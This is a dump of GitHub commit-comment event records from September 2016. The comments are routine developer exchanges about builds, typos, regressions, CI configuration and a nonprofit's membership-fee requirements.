{"id":"4633244491","type":"CommitCommentEvent","actor":{"login":"frederikfederspiel"},"repo":{"name":"peoples-fund/peoples-fund"},"payload":{"comment":{"id":19214265,"position":142,"line":145,"path":"docs/req-spec.md","commit_id":"fd5e3f391bf331f2a7b0df9864e0f7a2c3d0bfab","created_at":"2016-09-28T20:38:59Z","updated_at":"2016-09-28T20:38:59Z","body":"I don't know if we should close their account though... Hmm, I'll think\nabout that too, please tell me if you have a suggestion\n\n2016-09-28 22:37 GMT+02:00 Frederik Federspiel <frederikfederspiel@gmail.com\n>:\n\n> Hmm, I'll have to give that a think. We could perhaps have like a\n> \"life-long membership\" or \"honorary member thing\", where you just paid the\n> annual fee and didn't have to donate monthly anymore if you wanted to stop.\n> Or maybe we shouldn't, I'll think about it...\n>\n> ... which brings me to say:\n>\n> That we will need to have annual fees. There will have to be\n> \"kontingenter\", which will be like 100 kr or 150 kr or so and then the\n> monthly donations on top. This is for legal reasons in terms of our members\n> in Denmark being given a tax deduction for their donations to us and for us\n> being eligible for Danish Development Aid support and/or another major fund\n> in Denmark, not to mention tons of other funds. We will very much be valued\n> by the amount of \"kontingentbetalende\" (annual fee paying) members, and\n> that has to be an annual fee, not just monthly donations.\n>\n> I'm sure that should be rather easy to do with stripe...?\n>\n> 2016-09-28 21:07 GMT+02:00 Tord <notifications@github.com>:\n>\n>> Sorry to nitpick but if we want to see the \"History of one-time donations\n>> visible for user\" (see above) we need to connect the donations made by\n>> logged in users to their account. I will create a new requirement for\n>> donations for non-members\n>>\n>> —\n>> You are receiving this because you were mentioned.\n>> Reply to this email directly, view it on GitHub\n>> <https://github.com/peoples-fund/peoples-fund/commit/fd5e3f391bf331f2a7b0df9864e0f7a2c3d0bfab#commitcomment-19212890>,\n>> or mute the thread\n>> <https://github.com/notifications/unsubscribe-auth/ACAukbcwnloKp6e8UVDBe3X0yZO9wn1pks5qursJgaJpZM4KJL2t>\n>> .\n>>\n>\n>\n"}},"created_at":"2016-09-28T20:38:59Z"}
{"id":"4633246413","type":"CommitCommentEvent","actor":{"login":"MelisandeRiefler"},"repo":{"name":"MelisandeRiefler/corpus-joyce-portrait-TEI"},"payload":{"comment":{"id":19214274,"position":null,"line":null,"path":null,"commit_id":"e97d6f557bbf8147f6c3b0cb80b116ed58e80cbf","created_at":"2016-09-28T20:39:20Z","updated_at":"2016-09-28T20:39:20Z","body":"This commit is part of issue #37"}},"created_at":"2016-09-28T20:39:20Z"}
{"id":"4633250327","type":"CommitCommentEvent","actor":{"login":"Bodeguero"},"repo":{"name":"JadeEmu/JadeCore_547"},"payload":{"comment":{"id":19214293,"position":null,"line":null,"path":null,"commit_id":"aff39fa2f141f78326f2f30d5d81a195f551746d","created_at":"2016-09-28T20:40:04Z","updated_at":"2016-09-28T20:40:04Z","body":"@Keital **you will do the hack fix for her to support VS 2015?**"}},"created_at":"2016-09-28T20:40:04Z"}
{"id":"4633251443","type":"CommitCommentEvent","actor":{"login":"ramses0"},"repo":{"name":"ramses0/qb"},"payload":{"comment":{"id":19214296,"position":null,"line":null,"path":null,"commit_id":"7ea16bca01dc374669714d5afeb3e892e656555d","created_at":"2016-09-28T20:40:15Z","updated_at":"2016-09-28T20:40:15Z","body":"Size: +123kb"}},"created_at":"2016-09-28T20:40:15Z"}
{"id":"4633251699","type":"CommitCommentEvent","actor":{"login":"fafcrumb"},"repo":{"name":"unicef-polymer/etools-frontend-template"},"payload":{"comment":{"id":19214297,"position":null,"line":null,"path":null,"commit_id":"1038dd304d6196338fa085f6bd758ac900016341","created_at":"2016-09-28T20:40:17Z","updated_at":"2016-09-28T20:40:17Z","body":"Looking ahead, etools-data should also handle 'user' and 'permissions' properties by default. See [global-data.html](https://github.com/unicef/etools-partner-portal/blob/master/app/elements/common/global-data/global-data.html) from partner portal. "}},"created_at":"2016-09-28T20:40:17Z"}
{"id":"4633252154","type":"CommitCommentEvent","actor":{"login":"Huevos"},"repo":{"name":"OpenPLi/enigma2"},"payload":{"comment":{"id":19214299,"position":null,"line":null,"path":null,"commit_id":"5481348f5ed37e712aa0fd33d699ecda5139cf6f","created_at":"2016-09-28T20:40:22Z","updated_at":"2016-09-28T20:40:22Z","body":"> All OpenPLi stbs use the same libc and the DTV_ENUM_DELSYS exists.\r\n\r\nWhere is that? I'm trying to build a Dreambox and I am getting this error (not declared in this scope). Only place I can see this variable is in frontend.cpp and dvb.cpp. Build works fine on all other STBs."}},"created_at":"2016-09-28T20:40:22Z"}
{"id":"4633253797","type":"CommitCommentEvent","actor":{"login":"sebas932"},"repo":{"name":"CCAFS/MARLO"},"payload":{"comment":{"id":19214306,"position":10,"line":812,"path":"marlo-web/src/main/resources/global.properties","commit_id":"eafc73789c3a3c6b841a34ac04439b4709cdd912","created_at":"2016-09-28T20:40:40Z","updated_at":"2016-09-28T20:40:40Z","body":"Muchachos, tengamos mas cuidado al resolver conflictos =/"}},"created_at":"2016-09-28T20:40:40Z"}
{"id":"4633253829","type":"CommitCommentEvent","actor":{"login":"ramses0"},"repo":{"name":"ramses0/qb"},"payload":{"comment":{"id":19214307,"position":null,"line":null,"path":null,"commit_id":"7ea16bca01dc374669714d5afeb3e892e656555d","created_at":"2016-09-28T20:40:40Z","updated_at":"2016-09-28T20:40:40Z","body":"Size: +456kb"}},"created_at":"2016-09-28T20:40:40Z"}
{"id":"4633258188","type":"CommitCommentEvent","actor":{"login":"ryanlpeterson"},"repo":{"name":"SETeam5/uml-editor"},"payload":{"comment":{"id":19214317,"position":null,"line":null,"path":null,"commit_id":"73758b58ad39c07393eb54dcdbd6d840264d7416","created_at":"2016-09-28T20:41:28Z","updated_at":"2016-09-28T20:41:28Z","body":"Wow my bad! I do apologize!"}},"created_at":"2016-09-28T20:41:28Z"}
{"id":"4633261255","type":"CommitCommentEvent","actor":{"login":"slavapestov"},"repo":{"name":"apple/swift"},"payload":{"comment":{"id":19214323,"position":10,"line":869,"path":"lib/IDE/TypeReconstruction.cpp","commit_id":"b52f324cdb500a6a826a4413a30b5fdf3dfbc43c","created_at":"2016-09-28T20:41:58Z","updated_at":"2016-09-28T20:41:58Z","body":"Is there a test for this in lldb?"}},"created_at":"2016-09-28T20:41:58Z"}
{"id":"4633263128","type":"CommitCommentEvent","actor":{"login":"kfulton121"},"repo":{"name":"SETeam5/uml-editor"},"payload":{"comment":{"id":19214334,"position":null,"line":null,"path":null,"commit_id":"73758b58ad39c07393eb54dcdbd6d840264d7416","created_at":"2016-09-28T20:42:19Z","updated_at":"2016-09-28T20:42:19Z","body":"It's all good! "}},"created_at":"2016-09-28T20:42:19Z"}
{"id":"4633268517","type":"CommitCommentEvent","actor":{"login":"lucabrivio"},"repo":{"name":"lucabrivio/Stockfish"},"payload":{"comment":{"id":19214352,"position":null,"line":null,"path":null,"commit_id":"583727970e83b7f08b52666edb99555fad8d02a1","created_at":"2016-09-28T20:43:15Z","updated_at":"2016-09-28T20:43:15Z","body":"@Rocky640 Yes, I see SPSA also as a way to complement our concepts based on sometimes cointerintuitive behaviors... By the way I thought I'd better use files instead of squares for I'm mostly interested in the \"long term\" evaluation, but because of this very reason I reckon that midgame value will be more important... ;-) Nonetheless, the current best values do make sense...\r\nSo if I have no different inputs I think I'll go on and tune midgame values too!"}},"created_at":"2016-09-28T20:43:15Z"}
{"id":"4633268938","type":"CommitCommentEvent","actor":{"login":"mattkrick"},"repo":{"name":"ParabolInc/action"},"payload":{"comment":{"id":19214354,"position":5,"line":109,"path":"src/universal/modules/userDashboard/components/UserActionList/UserActionListItem.js","commit_id":"bd1fe45b21d24f362bf139de1e5a199b8a0eef51","created_at":"2016-09-28T20:43:19Z","updated_at":"2016-09-28T20:43:19Z","body":"Oh nevermind that, I just did it this morning. Feel free to remove!"}},"created_at":"2016-09-28T20:43:19Z"}
{"id":"4633269619","type":"CommitCommentEvent","actor":{"login":"SoftwareRVG"},"repo":{"name":"SoftwareRVG/mde_design"},"payload":{"comment":{"id":19214357,"position":null,"line":null,"path":null,"commit_id":"cb7827458046ada07681a0d2636fcc7a9f4310f9","created_at":"2016-09-28T20:43:26Z","updated_at":"2016-09-28T20:43:26Z","body":"## View on debug mode:\r\n### [mozilla developer edition design-css-svg-demo](http://s.codepen.io/SoftwareRVG/debug/JRJZVW)"}},"created_at":"2016-09-28T20:43:26Z"}
{"id":"4633270789","type":"CommitCommentEvent","actor":{"login":"astec"},"repo":{"name":"driftyco/ionic"},"payload":{"comment":{"id":19214359,"position":11,"line":330,"path":"CHANGELOG.md","commit_id":"26281a7a26ed5616e14361af6c9c546ef0f73117","created_at":"2016-09-28T20:43:36Z","updated_at":"2016-09-28T20:43:36Z","body":"@danbucholtz you said previously today that we should use LTS version of Node (4.6.0) but it comes with npm 2.15.9\r\n\r\n```\r\n$ node -v\r\nv4.6.0\r\n$ npm --version\r\n2.15.9\r\n```\r\n\r\nDoes it mean we better use Node 6.7.0 or manually upgrade npm to v3?"}},"created_at":"2016-09-28T20:43:36Z"}
{"id":"4633270975","type":"CommitCommentEvent","actor":{"login":"lffsantos"},"repo":{"name":"ITinDublin/itindublin.github.io"},"payload":{"comment":{"id":19214360,"position":14,"line":7,"path":".travis.yml","commit_id":"7b8e3500e4de4d86b75ab51b0a12d055749100c9","created_at":"2016-09-28T20:43:40Z","updated_at":"2016-09-28T20:43:40Z","body":"openssl aes-256-cbc -K $encrypted_5ca802f9d3d2_key -iv $encrypted_5ca802f9d3d2_iv -in publish-key.enc -out ~/.ssh/publish-key -d\r\n\r\nfaltou o '-out'"}},"created_at":"2016-09-28T20:43:40Z"}
{"id":"4633273122","type":"CommitCommentEvent","actor":{"login":"Deryugin"},"repo":{"name":"embox/embox"},"payload":{"comment":{"id":19214366,"position":23,"line":23,"path":"src/net/util/show_packet.h","commit_id":"8ecf499184aeeb686c689d5c5b80be0f769948e2","created_at":"2016-09-28T20:44:03Z","updated_at":"2016-09-28T20:44:03Z","body":"TBH I simply copy-pasted this part from util/log.\r\nWithout '&' build fails."}},"created_at":"2016-09-28T20:44:03Z"}
{"id":"4633275500","type":"CommitCommentEvent","actor":{"login":"lffsantos"},"repo":{"name":"ITinDublin/itindublin.github.io"},"payload":{"comment":{"id":19214376,"position":14,"line":7,"path":".travis.yml","commit_id":"f468ec5f2c194daf85f3a08335bba1fe9551c2ce","created_at":"2016-09-28T20:44:28Z","updated_at":"2016-09-28T20:44:28Z","body":"openssl aes-256-cbc -K $encrypted_5ca802f9d3d2_key -iv $encrypted_5ca802f9d3d2_iv -in publish-key.enc -out ~/.ssh/publish-key -d\r\n\r\nfaltou o '-out'"}},"created_at":"2016-09-28T20:44:28Z"}
{"id":"4633276663","type":"CommitCommentEvent","actor":{"login":"frmdstryr"},"repo":{"name":"frmdstryr/garden.mapview"},"payload":{"comment":{"id":19214381,"position":null,"line":null,"path":null,"commit_id":"8e101d5cf21206b2e192beab5a382f7615ca42ad","created_at":"2016-09-28T20:44:39Z","updated_at":"2016-09-28T20:44:39Z","body":"Sorry on android you must create a cython recipe for buildozer."}},"created_at":"2016-09-28T20:44:39Z"}
{"id":"4633284381","type":"CommitCommentEvent","actor":{"login":"falconmick"},"repo":{"name":"Microsoft/TypeScript-Handbook"},"payload":{"comment":{"id":19214397,"position":null,"line":null,"path":null,"commit_id":"1de9a088879608c8d90be4e3c162a8588eba27b7","created_at":"2016-09-28T20:45:56Z","updated_at":"2016-09-28T20:45:56Z","body":"Hey I was just reading over this. Why is this the case?"}},"created_at":"2016-09-28T20:45:56Z"}
{"id":"4633298772","type":"CommitCommentEvent","actor":{"login":"mtxr"},"repo":{"name":"gabrielebarbieri/SQLTools"},"payload":{"comment":{"id":19214430,"position":17,"line":90,"path":"SQLTools.py","commit_id":"f33ec415fb0adc40fd26c35d89e35bafc8495dd2","created_at":"2016-09-28T20:48:25Z","updated_at":"2016-09-28T20:48:25Z","body":"Hey! I like this idea.\r\n\r\nCould you create a pull request? Also, it would be awesome if we use selector as an option (default as source.sql but we could also use it on php, python sources etc)\r\n\r\nJust a suggestion\r\n"}},"created_at":"2016-09-28T20:48:25Z"}
{"id":"4633298925","type":"CommitCommentEvent","actor":{"login":"ailsoncgt"},"repo":{"name":"amadeusproject/amadeuslms"},"payload":{"comment":{"id":19214433,"position":null,"line":null,"path":null,"commit_id":"ffdd0fc448ae33be290811d17059bd6a56f50d01","created_at":"2016-09-28T20:48:26Z","updated_at":"2016-09-28T20:48:26Z","body":"coloca manualmente até chegar no test @fbormann \r\n\r\npython manage.py test core.tests.RegisterUserTestCase"}},"created_at":"2016-09-28T20:48:26Z"}
{"id":"4633303341","type":"CommitCommentEvent","actor":{"login":"NoahFrank"},"repo":{"name":"NoahFrank/homeblame"},"payload":{"comment":{"id":19214441,"position":null,"line":null,"path":null,"commit_id":"e8fbbbe959c9cf32ac765fb690d8a2339bd0b2a0","created_at":"2016-09-28T20:49:11Z","updated_at":"2016-09-28T20:49:11Z","body":"Great work! Thanks for committing!"}},"created_at":"2016-09-28T20:49:11Z"}
{"id":"4633303928","type":"CommitCommentEvent","actor":{"login":"cmsc495-fall2016"},"repo":{"name":"cmsc495-fall2016/cmsc495-fall2016.github.io"},"payload":{"comment":{"id":19214445,"position":null,"line":null,"path":null,"commit_id":"fa61c5e7555a4751166165e89a967ee770b1ed66","created_at":"2016-09-28T20:49:16Z","updated_at":"2016-09-28T20:49:16Z","body":"Recipe Dao is missing ingredients fetch "}},"created_at":"2016-09-28T20:49:16Z"}
{"id":"4633303978","type":"CommitCommentEvent","actor":{"login":"robertmills"},"repo":{"name":"Tcmg412-b/team-B"},"payload":{"comment":{"id":19214446,"position":null,"line":null,"path":null,"commit_id":"ae813d12621b92e1060f725f6e2d35e00242ffce","created_at":"2016-09-28T20:49:17Z","updated_at":"2016-09-28T20:49:17Z","body":"fix "}},"created_at":"2016-09-28T20:49:17Z"}
{"id":"4633304086","type":"CommitCommentEvent","actor":{"login":"athoik"},"repo":{"name":"OpenPLi/enigma2"},"payload":{"comment":{"id":19214447,"position":null,"line":null,"path":null,"commit_id":"5481348f5ed37e712aa0fd33d699ecda5139cf6f","created_at":"2016-09-28T20:49:18Z","updated_at":"2016-09-28T20:49:18Z","body":"Does the following `PREFERRED_VERSION_linux-libc-headers = \"3.2\"` exist on meta-dream? (https://github.com/oe-alliance/oe-alliance-core/blob/3.4/meta-brands/meta-dream/conf/machine/include/dreambox.inc)\r\n\r\nIf yes you are using old libc-headers."}},"created_at":"2016-09-28T20:49:18Z"}
{"id":"4633305554","type":"CommitCommentEvent","actor":{"login":"davidamichelson"},"repo":{"name":"srophe/e-gedsh"},"payload":{"comment":{"id":19214450,"position":null,"line":null,"path":null,"commit_id":"968919490e744d876c85a1645de9e68b21a3e927","created_at":"2016-09-28T20:49:33Z","updated_at":"2016-09-28T20:49:33Z","body":"Hi Winona, I looked back through the commits chronologically and I think this is the one that caused https://github.com/srophe/e-gedsh/issues/21 so the two prior commits are fine."}},"created_at":"2016-09-28T20:49:33Z"}
{"id":"4633312732","type":"CommitCommentEvent","actor":{"login":"aconanlai"},"repo":{"name":"n10as/n20.as"},"payload":{"comment":{"id":19214470,"position":null,"line":null,"path":null,"commit_id":"c5684fd1ebee5b79b217db9575cf30e043aaf832","created_at":"2016-09-28T20:50:44Z","updated_at":"2016-09-28T20:50:44Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [[FT-016] Client: Menu & container for archives, shows, shop, etc.](https://trello.com/c/woA4xOR5/22-ft-016-client-menu-container-for-archives-shows-shop-etc)"}},"created_at":"2016-09-28T20:50:44Z"}
{"id":"4633313763","type":"CommitCommentEvent","actor":{"login":"ailsoncgt"},"repo":{"name":"amadeusproject/amadeuslms"},"payload":{"comment":{"id":19214472,"position":null,"line":null,"path":null,"commit_id":"ffdd0fc448ae33be290811d17059bd6a56f50d01","created_at":"2016-09-28T20:50:55Z","updated_at":"2016-09-28T20:50:55Z","body":"Aqui funcionou tranquilo ..."}},"created_at":"2016-09-28T20:50:55Z"}
{"id":"4633314551","type":"CommitCommentEvent","actor":{"login":"Malow"},"repo":{"name":"Malow/NamedMutex"},"payload":{"comment":{"id":19214477,"position":28,"line":28,"path":"src/main/java/com/mooo/malow/namedmutex/NamedMutexHandler.java","commit_id":"daaa68b26e033330870a541c2b6ef6f70d1ee5e9","created_at":"2016-09-28T20:51:03Z","updated_at":"2016-09-28T20:51:03Z","body":"Hmm good question, the point of the reset method is to clear all the static memory taken up by the mutexes, say you want a soft restart of the program without actually exiting the program and re-launching it. I can't think of any other way to do this really right now at least, let me know if you think of something."}},"created_at":"2016-09-28T20:51:03Z"}
{"id":"4633317541","type":"CommitCommentEvent","actor":{"login":"sergio-teruel"},"repo":{"name":"guewen/connector-prestashop"},"payload":{"comment":{"id":19214484,"position":null,"line":null,"path":null,"commit_id":"db9690f0390f9a34ed54fffcbb261ddb964195f7","created_at":"2016-09-28T20:51:35Z","updated_at":"2016-09-28T20:51:35Z","body":"@simahawk Are you sure that this name is correct for all Ps versions?? Depending of ps version the names are plurals or singulars."}},"created_at":"2016-09-28T20:51:35Z"}
{"id":"4633318731","type":"CommitCommentEvent","actor":{"login":"Codepixl"},"repo":{"name":"Codepixl/GLCraft"},"payload":{"comment":{"id":19214488,"position":null,"line":null,"path":null,"commit_id":"c52d5d7a7a02cf50db04bbbc5cf18e65f657c199","created_at":"2016-09-28T20:51:46Z","updated_at":"2016-09-28T20:51:46Z","body":"Both work.\n\nOn Wed, Sep 28, 2016, 2:14 PM Isaiah Patton <notifications@github.com>\nwrote:\n\n> its not System.getProperty(\"file.separator\") its just File.separator\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/Codepixl/GLCraft/commit/c52d5d7a7a02cf50db04bbbc5cf18e65f657c199#commitcomment-19213818>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AJvpcg5mgtmAtTV4PgyI-85KGSsAjc4Bks5qusqhgaJpZM4KJQts>\n> .\n>\n"}},"created_at":"2016-09-28T20:51:46Z"}
{"id":"4633323564","type":"CommitCommentEvent","actor":{"login":"badboy"},"repo":{"name":"skade/rfcs"},"payload":{"comment":{"id":19214499,"position":47,"line":47,"path":"text/0000-rust-project-conferences.md","commit_id":"11023aa58e716b2802b45d6bbec9272139fd16b6","created_at":"2016-09-28T20:52:36Z","updated_at":"2016-09-28T20:52:36Z","body":"affortable → affordable"}},"created_at":"2016-09-28T20:52:36Z"}
{"id":"4633325026","type":"CommitCommentEvent","actor":{"login":"badboy"},"repo":{"name":"skade/rfcs"},"payload":{"comment":{"id":19214502,"position":68,"line":68,"path":"text/0000-rust-project-conferences.md","commit_id":"11023aa58e716b2802b45d6bbec9272139fd16b6","created_at":"2016-09-28T20:52:51Z","updated_at":"2016-09-28T20:52:51Z","body":"desierable → desirable"}},"created_at":"2016-09-28T20:52:51Z"}
{"id":"4633327179","type":"CommitCommentEvent","actor":{"login":"Codepixl"},"repo":{"name":"Codepixl/GLCraft"},"payload":{"comment":{"id":19214511,"position":null,"line":null,"path":null,"commit_id":"c52d5d7a7a02cf50db04bbbc5cf18e65f657c199","created_at":"2016-09-28T20:53:15Z","updated_at":"2016-09-28T20:53:15Z","body":"@IsaiahPatton Both work."}},"created_at":"2016-09-28T20:53:15Z"}
{"id":"4633328072","type":"CommitCommentEvent","actor":{"login":"jmcphers"},"repo":{"name":"rstudio/rstudio"},"payload":{"comment":{"id":19214513,"position":null,"line":null,"path":null,"commit_id":"0cfb3de2f8ab5e9fc98c869239659090fdcfae32","created_at":"2016-09-28T20:53:24Z","updated_at":"2016-09-28T20:53:24Z","body":"cc @javierluraschi -- I ran a trial build on the OS X build machine and found that your earlier change doesn't work on it (it's running Mavericks) so backing out for now. @kevinushey made the original change presumably for Sierra compatibility, but it also breaks compilation on my El Capitan machine. Can the two of you suggest a change that works on all three?  "}},"created_at":"2016-09-28T20:53:24Z"}
{"id":"4633330496","type":"CommitCommentEvent","actor":{"login":"badboy"},"repo":{"name":"skade/rfcs"},"payload":{"comment":{"id":19214523,"position":60,"line":60,"path":"text/0000-rust-project-conferences.md","commit_id":"11023aa58e716b2802b45d6bbec9272139fd16b6","created_at":"2016-09-28T20:53:51Z","updated_at":"2016-09-28T20:53:51Z","body":"I don't understand the last part, looks like a typo.\r\nShould this be something along \"... to ensure they don't need to work **on** things on their own all the time\"?"}},"created_at":"2016-09-28T20:53:51Z"}
{"id":"4633332692","type":"CommitCommentEvent","actor":{"login":"Yoselhy"},"repo":{"name":"factus-lib/factus"},"payload":{"comment":{"id":19214530,"position":66,"line":57,"path":"_posts/desktop/2015-04-20-csharp.md","commit_id":"990fbf79e7d3e09b7893eda9e692394d6601428d","created_at":"2016-09-28T20:54:13Z","updated_at":"2016-09-28T20:54:13Z","body":"hola"}},"created_at":"2016-09-28T20:54:13Z"}
{"id":"4633332875","type":"CommitCommentEvent","actor":{"login":"atsu85"},"repo":{"name":"MeirionHughes/aurelia-template-lint"},"payload":{"comment":{"id":19214532,"position":23,"line":1336,"path":"spec/binding.spec.ts","commit_id":"87a177ae710b49178221897c6e2e63138f1b55ae","created_at":"2016-09-28T20:54:15Z","updated_at":"2016-09-28T20:54:15Z","body":"Have You added `ref` attributes by accident? I guess it isn't valid to have more than one element with same `ref`?"}},"created_at":"2016-09-28T20:54:15Z"}
{"id":"4633333108","type":"CommitCommentEvent","actor":{"login":"alexlatchford"},"repo":{"name":"coleifer/peewee"},"payload":{"comment":{"id":19214533,"position":null,"line":null,"path":null,"commit_id":"3260a9797ae217024cda1e963b8c5c2c9dec5ab2","created_at":"2016-09-28T20:54:17Z","updated_at":"2016-09-28T20:54:17Z","body":"Hi Charles,\r\n\r\nJust been debugging the root cause behind: https://github.com/coleifer/peewee/issues/1077\r\n\r\nLooks like this commit was the cause. Can you give a bit of background on why the library now discards group_by/having statements (I see order_by is now removed in master). This has broken some code we were relying on. Bit at a loss to understand a work around and still keep things performant without this :/\r\n\r\nMany thanks,\r\nAlex"}},"created_at":"2016-09-28T20:54:17Z"}
{"id":"4633336532","type":"CommitCommentEvent","actor":{"login":"badboy"},"repo":{"name":"skade/rfcs"},"payload":{"comment":{"id":19214543,"position":80,"line":80,"path":"text/0000-rust-project-conferences.md","commit_id":"11023aa58e716b2802b45d6bbec9272139fd16b6","created_at":"2016-09-28T20:54:53Z","updated_at":"2016-09-28T20:54:53Z","body":"Project partnership as in the partnership of the conf with the official Rust project?"}},"created_at":"2016-09-28T20:54:53Z"}
{"id":"4633337509","type":"CommitCommentEvent","actor":{"login":"DzmitryShylovich"},"repo":{"name":"angular/material2"},"payload":{"comment":{"id":19214546,"position":null,"line":null,"path":null,"commit_id":"276d07da031a64d8324306409edefb095bf4753e","created_at":"2016-09-28T20:55:02Z","updated_at":"2016-09-28T20:55:02Z","body":"when this will be available in npm?"}},"created_at":"2016-09-28T20:55:02Z"}
{"id":"4633338265","type":"CommitCommentEvent","actor":{"login":"badboy"},"repo":{"name":"skade/rfcs"},"payload":{"comment":{"id":19214548,"position":82,"line":82,"path":"text/0000-rust-project-conferences.md","commit_id":"11023aa58e716b2802b45d6bbec9272139fd16b6","created_at":"2016-09-28T20:55:11Z","updated_at":"2016-09-28T20:55:11Z","body":"then → than"}},"created_at":"2016-09-28T20:55:11Z"}
{"id":"4633342024","type":"CommitCommentEvent","actor":{"login":"jf---"},"repo":{"name":"DLR-SC/tigl"},"payload":{"comment":{"id":19214558,"position":null,"line":null,"path":null,"commit_id":"d706e80c95dd09db459dd6dbfd692842da2cdefc","created_at":"2016-09-28T20:55:50Z","updated_at":"2016-09-28T20:55:50Z","body":"serious work @rainman110 ... impressive... are you statically linking such that you can distribute through things like app store? or simple minimizing reliance on the OS?"}},"created_at":"2016-09-28T20:55:50Z"}
{"id":"4633344660","type":"CommitCommentEvent","actor":{"login":"davidjsherman"},"repo":{"name":"aseba-community/dashel"},"payload":{"comment":{"id":19214571,"position":13,"line":583,"path":"dashel/dashel-posix.cpp","commit_id":"474435c132694c5ca4d546d8e28fd79220e83106","created_at":"2016-09-28T20:56:18Z","updated_at":"2016-09-28T20:56:18Z","body":"OK I'll do that.\r\nSince the library version is changing, wouldn't that discourage using or linking an out of date Dashel anyway?"}},"created_at":"2016-09-28T20:56:18Z"}
{"id":"4633346228","type":"CommitCommentEvent","actor":{"login":"philmmanjaro"},"repo":{"name":"manjaro/manjaro-tools-iso-profiles"},"payload":{"comment":{"id":19214576,"position":null,"line":null,"path":null,"commit_id":"0c1ac3e277f635fdd0f82080c0191c6ac2e0c2b3","created_at":"2016-09-28T20:56:35Z","updated_at":"2016-09-28T20:56:35Z","body":"Why is **qt5ct** needed here?"}},"created_at":"2016-09-28T20:56:35Z"}
{"id":"4633349331","type":"CommitCommentEvent","actor":{"login":"thijstriemstra"},"repo":{"name":"muaz-khan/RecordRTC"},"payload":{"comment":{"id":19214581,"position":21,"line":1650,"path":"RecordRTC.js","commit_id":"89ab8da9333db3591e7c65af0bc766fc3aa582ab","created_at":"2016-09-28T20:57:10Z","updated_at":"2016-09-28T20:57:10Z","body":"@muaz-khan this change doesn't allow me to force a different audio mimetype anymore, e.g. `audio/wav`."}},"created_at":"2016-09-28T20:57:10Z"}
{"id":"4633353231","type":"CommitCommentEvent","actor":{"login":"wpolicarpo"},"repo":{"name":"ITinDublin/itindublin.github.io"},"payload":{"comment":{"id":19214586,"position":14,"line":7,"path":".travis.yml","commit_id":"f468ec5f2c194daf85f3a08335bba1fe9551c2ce","created_at":"2016-09-28T20:57:49Z","updated_at":"2016-09-28T20:57:49Z","body":"👍 "}},"created_at":"2016-09-28T20:57:49Z"}
{"id":"4633361247","type":"CommitCommentEvent","actor":{"login":"groll75"},"repo":{"name":"paysafegroup/neteller_rest_api_v1"},"payload":{"comment":{"id":19214605,"position":null,"line":null,"path":null,"commit_id":"c89c2953e9875ed1aee4d1d598c9db44a356b173","created_at":"2016-09-28T20:59:10Z","updated_at":"2016-09-28T20:59:10Z","body":"__API Description file syntax error on line 4605__: named type 'customer' is defined more than once (Autogenerated message from apiary.io)"}},"created_at":"2016-09-28T20:59:10Z"}
{"id":"4633364132","type":"CommitCommentEvent","actor":{"login":"gappleto97"},"repo":{"name":"pizzaisdavid/p2p-project"},"payload":{"comment":{"id":19214615,"position":null,"line":null,"path":null,"commit_id":"0eb77e61d2e9a778c08e696d503a85e3e79ee155","created_at":"2016-09-28T20:59:40Z","updated_at":"2016-09-28T20:59:40Z","body":"Partly because it looks like this does module level scope, rather than instance level. Instance level is where it's useful, because then you get to figure out what that instance knows about.\r\n\r\nImagine a world where you have multiple instances in the same shell. For instance, during a unit test.\r\n\r\nIt looks like in this case you wouldn't know who is getting what messages.\r\n\r\nBut I could be wrong here. I've never used `logging`."}},"created_at":"2016-09-28T20:59:40Z"}
{"id":"4633370668","type":"CommitCommentEvent","actor":{"login":"SM411"},"repo":{"name":"PokemonGoMap/PokemonGo-Map"},"payload":{"comment":{"id":19214638,"position":null,"line":null,"path":null,"commit_id":"9b3927efc7aee1d836f099572f5be96ac5cac323","created_at":"2016-09-28T21:00:44Z","updated_at":"2016-09-28T21:00:44Z","body":"What would an encounter whitelist look like?"}},"created_at":"2016-09-28T21:00:44Z"}
{"id":"4633371256","type":"CommitCommentEvent","actor":{"login":"Malow"},"repo":{"name":"Malow/NamedMutex"},"payload":{"comment":{"id":19214640,"position":41,"line":41,"path":"src/test/java/com/mooo/malow/namedmutex/stabilitytest/DataOperationThread.java","commit_id":"daaa68b26e033330870a541c2b6ef6f70d1ee5e9","created_at":"2016-09-28T21:00:51Z","updated_at":"2016-09-28T21:00:51Z","body":"You are correct my friend."}},"created_at":"2016-09-28T21:00:51Z"}
{"id":"4633374048","type":"CommitCommentEvent","actor":{"login":"groll75"},"repo":{"name":"paysafegroup/neteller_rest_api_v1"},"payload":{"comment":{"id":19214646,"position":null,"line":null,"path":null,"commit_id":"c89c2953e9875ed1aee4d1d598c9db44a356b173","created_at":"2016-09-28T21:01:17Z","updated_at":"2016-09-28T21:01:17Z","body":"__API Description file syntax error on line 4605__: named type 'customer' is defined more than once (Autogenerated message from apiary.io)"}},"created_at":"2016-09-28T21:01:17Z"}
{"id":"4633376518","type":"CommitCommentEvent","actor":{"login":"emschwartz"},"repo":{"name":"interledger/js-ilp-plugin-bells"},"payload":{"comment":{"id":19214650,"position":47,"line":595,"path":"src/lib/plugin.js","commit_id":"e7c603215c6bfe9d90c4a1c2cd85b68848442c7b","created_at":"2016-09-28T21:01:43Z","updated_at":"2016-09-28T21:01:43Z","body":"If the body is an object it will just print `[object Object]` here"}},"created_at":"2016-09-28T21:01:43Z"}
{"id":"4633381595","type":"CommitCommentEvent","actor":{"login":"crumdidlyumshis"},"repo":{"name":"ElvUI-WotLK/ElvUI_Bunny"},"payload":{"comment":{"id":19214665,"position":null,"line":null,"path":null,"commit_id":"7b90941ce8d3d171b808d06a6950c92493bfc4b6","created_at":"2016-09-28T21:02:37Z","updated_at":"2016-09-28T21:02:37Z","body":"Very nice! However, would it be better to add as separate addon like https://github.com/crumdidlyumshis/BNetToast then add ElvUI_AddonSkins? Just a thought 👍 \r\n\r\nThis way, more people can use it, but maybe they don't use ElvUI. If disagree, ignore this comment. 💃 "}},"created_at":"2016-09-28T21:02:37Z"}
